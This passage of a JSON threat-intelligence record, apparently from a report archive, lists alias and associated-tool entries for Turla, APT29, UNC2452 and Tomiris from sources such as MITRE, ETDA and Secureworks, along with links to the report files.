Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "493c47f7-b265-4b10-95de-d86af942c543", "created_at": "2023-04-27T02:04:45.385041Z", "updated_at": "2026-04-10T02:00:04.939878Z", "deleted_at": null, "main_name": "Tomiris", "aliases": [], "source_name": "ETDA:Tomiris", "tools": [ "JLOGRAB", "JLORAT", "Kapushka", "KopiLuwak", "Meterpreter", "QUIETCANARY", "RATel", "RocketMan", "Roopy", "Telemiris", "Tomiris", "Topinambour", "Tunnus", "Warzone", "Warzone RAT" ], "source_id": "ETDA", "reports": null }, { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433988, "ts_updated_at": 1775792253, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9.pdf", "text": "https://archive.orkl.eu/efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9.txt", "img": "https://archive.orkl.eu/efb90cc230f9f566fd7dc3a0bfbc45a8ecaa65d9.jpg" } }